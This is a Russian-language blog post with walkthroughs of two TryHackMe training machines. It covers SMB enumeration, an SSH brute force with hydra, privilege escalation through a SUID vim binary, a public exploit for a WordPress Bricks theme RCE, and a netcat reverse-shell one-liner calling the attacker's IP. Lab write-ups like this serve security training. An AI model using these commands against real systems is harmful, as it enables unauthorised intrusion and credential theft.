miz0ru

TryHackMe: Basic Pentesting

miz0ru — Sun, 08 Jun 2025 17:22:44 GMT

https://tryhackme.com/room/basicpentestingjt

This is a machine that allows you to practice web app hacking and privilege escalation

МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU КАНАЛ @MIZ0RUMAIN

Всех приветствую на райтапе лёгкой машины на THM "Basic Pentesting"!

По классике подключаемся по OpenVPN, вписываем хост

echo "10.XX.XX.XX basic.thm" | sudo tee -a /etc/hosts

Запускаем nmap-скан

sudo nmap -A -vv 10.XX.XX.XX

Я сразу пошёл проверять OpenSSH 7.2p2 через searchsploit

searchsploit OpenSSH 7.2p2

Нашёлся Username Enumeration эксплоит, и можно было бы узнать юзернеймы, но я решил работать с Samb'ой. Запустим gobuster по директориям

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u basic.thm

Найдём директорию development, что станет нашим ответом. Внутри будет два .txt-файла, но там нет ничего ценного.

Вспоминаем, что на сервере есть SMB, подключимся посредством

smbclient -L //basic.thm -N

-L - показать все доступные через SMB директории

-N - без пароля

Найдём директорию Anonymous, подключимся к ней

smbclient //basic.thm/Anonymous -N

Откроем список файлов и скачаем его с помощью get

ls
get staff.txt

После этого файл скачается в директорию, из которой вы подключились к SMB

Внутри есть 2 имени: Jan и Kay, имя Jan подойдёт нам для ответа на пятый вопрос.

Давайте сбуртим SSH используя имя Jan (самбу сбрутить не получится и Kay тоже). Воспользуемся для этого hydra и словарём rockyou.

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://basic.thm

Находим пароль armando и подключаемся с этими данными по SSH, протокол, по которому мы подключаемся - седьмой ответ

ssh jan@basic.thm

Внутри пусто, спустимся в директорию /home/ и узнаем что там

jan@basic2:~$ ls
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ cd ..
jan@basic2:~/home$ ls
jan kay

Попробуем узнать, что мы можем запускать используя sudo -l

jan@basic2:~$ sudo -l
[sudo] password for jan:
Sorry, user jan may not run sudo on basic2.

Столкнёмся с ошибкой. Попробуем войти в kay, опять столкнёмся с ошибкой

jan@basic2:/home$ sudo kay
[sudo] password for jan:
jan is not in the sudoers file. This incident will be reported

В таком случае нам надо воспользоваться SUID. Это специальный бит, отвечающий за то, чтобы программу запускать от имени владельца.

Чтобы найти все такие файлы воспользуемся командой

find / -perm -4000 -type f 2>/dev/null

find - команда чтобы найти файлы

/ - чтобы начать поиск по всей системе

-perm -4000 - ищет файлы с правами доступа 4000, то есть с SUID-битом

-type f - ищет только файлы (исключая каталоги, сокеты...)

2>/dev/null - отключает вывод ошибок доступа, переправляя их в /dev/null

Из данного списка сразу в глаза бросается, vim, будем иметь это ввиду

/usr/bin/vim.basic

Откроем директорию /home/kay и попробуем прочитать с помощью cat pass.bak, но нам скажет, что у нас недостаточно прав. Узнаем полную информацию о файле и правах с помощью

ls -la

Увидим, что у файла pass.bak есть атрибут r, то есть открывается от имени рута. И вспоминаем, что vim, как раз умеет так делать, пишем

vim pass.bak

И вот наш последний ответ! Чтобы выйти из vim'а, просто напишите

:q

И нажмите Enter, поздравляю с ещё одной решённой задачей!

МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU КАНАЛ @MIZ0RUMAIN

TryHACK3M: Bricks Heist

miz0ru — Thu, 05 Jun 2025 15:09:57 GMT

https://tryhackme.com/room/tryhack3mbricksheist

Crack the code, command the exploit! Dive into the heart of the system with just an RCE CVE as your key.

МАТЕРИАЛ БЫЛ ПОДГОТОВЛЕН @MIZ0RU ДЛЯ ФОРУМА @FORUMZERODAY ПРОСЬБА ПОДПИСАТЬСЯ

Всех приветствую, это райт-ап (write-up) лёгкой машины на THM "Bricks Heist".

Подключимся по OpenVPN
Добавим айпишник и хост в /etc/hosts

echo "10.XX.XX.XX bricks.thm" | sudo tee -a /etc/hosts

Запустим nmap-скан

sudo nmap -sS -sC -sV -T4 -vv 10.XX.XX.XX```

Внизу также есть MySQL, но он не понадобился. Стоит пока обратить внимание на директорию /wp-admin/. Попробуем открыть сам сайт по http протоколу, но столкнёмся с ошибкой

Попробуем перейти по httpS, SSL недействительный. Но сайт хотя бы грузится, но внутри будет только стена. Воспользуемся gobuster, чтобы прошелестить директории, воспользуемся списком directory-list-2.3-medium.txt.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://bricks.thm

Но выйдет ошибка, говорящая о недействительном SSL. Найдём соответствующий аргумент с помощью --help и grep

gobuster dir --help | grep "tls"

Найдём аргумент -k, который нам поможет запустить скан директорий.

Натыкаемся снова на директории от WordPress (wp-content, admin). Становится ясно, куда копать дальше - расчехляем wpscan. Опять сталкиваемся с проблемами с ssl, повторяем действия

wpscan --help | grep tls

Запустили скан и видим тему "bricks". Вспоминаем название задания, что является подсказкой и идём копать глубже.

Нехитрым запросом в гугле находим саму CVE и PoC к ней.

https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT - воспользуемся этим скриптом.

Клонируем репозиторий, входим в директорию и запускаем
git clone https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT
cd CVE-2024-25600-EXPLOIT
python CVE-2024-25600.py

Но мы столкнёмся с проблемой: ModuleNotFoundError: No module named 'alive_progress'. Как я её решил (конечно, не очень правильно)

nano CVE-2024-25600.py

Я просто закомментировал 13 строку, которая мешает работе скрипта. Сохранил (Ctrl + O, Enter, Ctrl + X)

И скрипт заработал! Чтобы совершить атаку пишем:

python CVE-2024-25600.py -u https://bricks.thm

Пара секунд и мы в шелле! Чтобы сделать всё надёжнее сделаем уже reverse shell. Воспользуемся генератором revshells.com. Настроим его под себя:

В разделе IP & PORT ставим айпишник, который нам выдаст команда

ifconfig

Нас интересует интерфейс tun0, читаем параметр inet и записываем значение айпи в генератор. Так же его можно увидеть в правом верхнем углу.

Чтобы слушать порт мы вводим в кали команду (откройте новый терминал):

nc -nvlp PORT

Выбираете порт, которым будете пользоваться для прослушивания, в моём случае 1337.

И как видно на скрине, я воспользовался payload'ом 'nc mkinfo', он работает безотказно. Пишем сгенерированную команду в строку Shell >

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.21.199.107 1337 >/tmp/f

И вуаля, на другом терминале у вас открылась копия командной строки (это нужно для того, что эксплойт может прерваться, что вам помешает).

Когда мы уже в системе напишем ls и увидим список файлов, первый будет подозрительный .txt'шник. Прочитаем его с помощью команды cat и получим наш первый флаг!

cat 650c844110baced87e1606453b93f22a.txt

Чтобы получить второй воспользуемся командой

systemctl | grep running

Обнаружим, что есть какой-то странный процесс ubuntu.service, его выдаёт подпись TRYHACK3M. Изучим его глубже:

systemctl status ubuntu.service

Увидим какой-то nm-inet-dialog, этот процесс и есть подозрительный, так что это будет наш второй флаг.

Третий флаг уже ясен, это ubuntu.service.

Перейдём в директорию /lib/NetworkManager/nm-inet-dialog и узнаем содержимое с помощью ls

cd /lib/NetworkManager/nm-inet-dialog
ls

Там будет inet.conf, прочитаем его содержание и увидим, что это и есть логи майнера, которые нам надо было найти.

cat inet.conf

Так же мы можем прочитать ID: ..., закинем его в CyberChef и попробуем расшифровать.

Казалось бы, вот наш ключ, но он неправильный. Из-за формата текст дублируется дважды, так что мы его отсекаем до момента, когда он повторится.

Это наш 4-ый флаг: bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

А теперь применим навыки OSINT, поищем владельца кошелька. Нас ведёт на blockchain.com: https://www.blockchain.com/explorer/addresses/btc/bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

Откроем транзакцию на 3.85799... BTC. Поищем в интернете этот адрес и наткнёмся на сводку от государства: https://ofac.treasury.gov/recent-actions/20240220. В ней уже можно прочитать о какой группировке идёт речь, это LockBit, что является нашим 5-ым флагом!